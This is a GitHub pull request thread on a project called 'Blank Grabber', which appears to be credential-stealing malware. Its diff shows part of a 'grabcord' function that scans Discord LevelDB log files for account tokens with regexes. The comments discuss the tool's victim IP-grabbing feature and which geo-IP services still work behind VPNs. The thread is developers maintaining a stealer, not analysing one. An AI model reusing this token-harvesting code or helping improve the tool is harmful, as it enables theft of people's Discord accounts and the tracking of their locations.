### PR TITLE
sleeker ip grabbing system, more reliable

### PR DESCRIPTION
**Pull request by mte0**

### CODE REVIEW

File: Blank Grabber/Data/main.py [hunk 1]
```diff
@@ -198,7 +198,7 @@ def grabcord(path):
                 if not filename.endswith('.log') and not filename.endswith('.ldb'):
                     continue
                 for line in [x.strip() for x in open(f'{path}/{filename}', errors='ignore').readlines() if x.strip()]:
-                    for reg in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
+                    for reg in (r"[\w-]{`24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
```
Comment (mte0) [inline Blank Grabber/Data/main.py:201]: accidentally added a "`", please edit and remove it

**Comment by Blank-c** [comment]
Is this a suggestion? Can you explain briefly what you want to be improved/added?

**Comment by mte0** [comment]
> Is this a suggestion? Can you explain briefly what you want to be improved/added?

its a pull request, ive already made the changes but while making said changes i accidentally put a **"`"** in one of the regexes. **I have fixed this now, you can merge this pull request to have my changes applied**

**Comment by Blank-c** [comment]
I don't see any other changes than the "`"

**Comment by Blank-c** [comment]
oh wait my bad

**Comment by Blank-c** [comment]
Actually I am already changing something at that ip part. Something is not properly working with that api.

**Comment by Blank-c** [comment]
Also utilities.tk is not working with some vpns

**Comment by mte0** [comment]
> Also utilities.tk is not working with some vpns

what do you mean?

**Comment by Blank-c** [comment]
tried it with my vpn and it didn't work but nvm I am using a different Geo IP service

**Comment by Blank-c** [comment]
> > Is this a suggestion? Can you explain briefly what you want to be improved/added?
> 
> its a pull request, ive already made the changes but while making said changes i accidentally put a **"`"** in one of the regexes. **I have fixed this now, you can merge this pull request to have my changes applied**

I know what a pull request it, I meant to ask if you were suggesting something or not

**Pull request closed without merging**